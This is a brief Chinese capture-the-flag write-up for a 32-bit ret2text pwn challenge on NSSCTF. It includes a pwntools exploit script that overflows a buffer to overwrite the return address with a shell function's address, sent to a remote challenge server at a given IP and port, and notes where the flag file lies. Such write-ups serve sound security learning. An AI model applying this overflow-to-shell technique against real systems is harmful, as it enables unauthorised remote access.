此题为一道32位的ret2text模板题,可以直接溢出修改返回地址为shell
但是在nssctf上flag并不在根目录下,而是在/home/ctf/flag.txt,需要注意
exp:
from pwn import *
# io=process("./getshell")
io=remote("1.14.71.254",28258)
func_addr=0x804851B
payload=cyclic(0x1c)+p32(func_addr)+p32(0)
io.sendline(payload)
io.interactive()